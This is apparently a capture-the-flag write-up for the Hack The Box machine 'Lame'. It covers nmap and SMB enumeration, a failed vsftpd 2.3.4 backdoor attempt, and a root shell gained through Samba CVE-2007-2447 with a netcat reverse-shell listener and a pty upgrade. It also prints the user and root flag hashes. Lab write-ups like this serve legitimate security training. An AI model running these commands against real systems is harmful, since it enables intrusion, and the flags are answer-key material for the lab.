Following on from Legacy is was time to complete Lame, the first of many Linux machines. The machine required simple enumeration and another SMB exploit, resulting in a root shell.
Machine IP = 10.10.10.3
RECON AND INFORMATION GATHERING
Nmap
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-19 16:41 BST Nmap scan report for 10.10.10.3 Host is up (0.053s latency). Not shown: 996 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to 10.10.14.13 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | vsFTPd 2.3.4 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) | ssh-hostkey: | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA) |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_ms-sql-info: ERROR: Script execution failed (use -d to debug) |_smb-os-discovery: ERROR: Script execution failed (use -d to debug) |_smb-security-mode: ERROR: Script execution failed (use -d to debug) |_smb2-time: Protocol negotiation failed (SMB2)
From our scan we can see FTP is open on 21, as well as ssh being open on port 22. Furthermore, we have SMB open on 139 & 445.
FTP
Anonymous Login
FTP anonymous login is enabled, however when checking the directory is is empty.
Exploits
After some googling, it turns out vsftpd 2.3.4 is commonly backdoored, and so i decided to see if there are any FTP exploits associated with vsftpd 2.3.4 using searchsploit
root@kali:~/Desktop# searchsploit vsftpd 2.3.4
----------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------- ----------------------------------------
vsftpd 2.3.4 - Backdoor Command Executio | exploits/unix/remote/17491.rb
----------------------------------------- ----------------------------------------
Shellcodes: No Result
Looks promising, so will come back to it after.
SMB
Anonymous Login
SMBmap shows the /tmp directory is accessible without credentials.
root@kali:~/Desktop# smbmap -H 10.10.10.3 [+] Finding open SMB ports.... [+] User SMB session established on 10.10.10.3... [+] IP: 10.10.10.3:445 Name: 10.10.10.3 Disk Permissions Comment ---- ----------- ------- print$ NO ACCESS Printer Drivers tmp READ, WRITE oh noes! opt NO ACCESS IPC$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian)) ADMIN$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian)) root@kali:~/Desktop#
At first i was unable to connect using smbclient, but after some googling i added client min protocol=NT1 to /etc/samba/smb.conf
However the directory did not yield anything interesting.
Exploits
Moving on i decided to search for Samba 3 in searchsploit
root@kali:~/Desktop# searchsploit Samba 3.0
-------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------- ----------------------------------------
Samba 3.0.10 (OSX) - 'lsa_io_trans_names' Heap Overflow (Metasploit) | exploits/osx/remote/16875.rb
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass | exploits/multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) | exploits/unix/remote/16320.rb
Samba 3.0.21 < 3.0.24 - LSA trans names Heap Overflow (Metasploit) | exploits/linux/remote/9950.rb
Samba 3.0.24 (Linux) - 'lsa_io_trans_names' Heap Overflow (Metasploit) | exploits/linux/remote/16859.rb
Samba 3.0.24 (Solaris) - 'lsa_io_trans_names' Heap Overflow (Metasploit) | exploits/solaris/remote/16329.rb
Samba 3.0.27a - 'send_mailslot()' Remote Buffer Overflow | exploits/linux/dos/4732.c
Samba 3.0.29 (Client) - 'receive_smb_raw()' Buffer Overflow (PoC) | exploits/multiple/dos/5712.pl
Samba 3.0.4 - SWAT Authorisation Buffer Overflow | exploits/linux/remote/364.pl
Samba < 3.0.20 - Remote Heap Overflow | exploits/linux/remote/7701.txt
-------------------------------------------------------------------------------------- ----------------------------------------
A wide range of exploits are available, with command execution available from Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)
Exploits
Exploiting VSFTPD
I started by searching msfconsole for any exploits associated with vsftpd.
msf5 > search vsftpd 2.3.4 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/gather/teamtalk_creds normal No TeamTalk Gather Credentials 1 exploit/multi/http/oscommerce_installer_unauth_code_exec 2018-04-30 excellent Yes osCommerce Installer Unauthenticated Code Execution 2 exploit/multi/http/struts2_namespace_ognl 2018-08-22 excellent Yes Apache Struts 2 Namespace Redirect OGNL Injection 3 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
exploit/unix/ftp/vsftpd_234_backdoor looks interesting, but sadly was unsuccessful.
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.10.3 RHOSTS => 10.10.10.3 msf5 exploit(unix/ftp/vsftpd_234_backdoor) > run [*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4) [*] 10.10.10.3:21 - USER: 331 Please specify the password. [*] Exploit completed, but no session was created. msf5 exploit(unix/ftp/vsftpd_234_backdoor) >
After looking into this exploit a little more, the exploit can be triggered by attempting to login using a username with an :) appended to the end of it, such as anonymous:)
Exploiting Samba
When googling Samba 3 Username remote code execution, CVE-2007-2447 comes up. Further googling provided a python script https://github.com/amriunix/CVE-2007-2447
Using the script, following the installation instructions allowed for an easy shell.
nc -nvlp 443
and then executing python script
root@kali:~/Desktop/CVE-2007-2447# python usermap_script.py 10.10.10.3 139 10.10.14.22 443 [*] CVE-2007-2447 - Samba usermap script [+] Connecting ! [+] Payload was sent - check netcat ! root@kali:~/Desktop/CVE-2007-2447#
On the netcat listener we are now connected as root.
root@kali:~/Desktop/CVE-2007-2447# nc -nvlp 443 listening on [any] 443 ... connect to [10.10.14.22] from (UNKNOWN) [10.10.10.3] 59119 id uid=0(root) gid=0(root)
Now we spawn a nicer python shell, and start searching for the flags.
python -c 'import pty; pty.spawn("bash")'
Flag Hunting
The flags were actually rather easy to find.
User.txt
root@lame:/home/makis# cat user.txt cat user.txt 69454a937d94f5f0225ea00acd2e84c5
Root.txt
root@lame:/root# cat root.txt cat root.txt 92caac3be140ef409e45721348a4e9df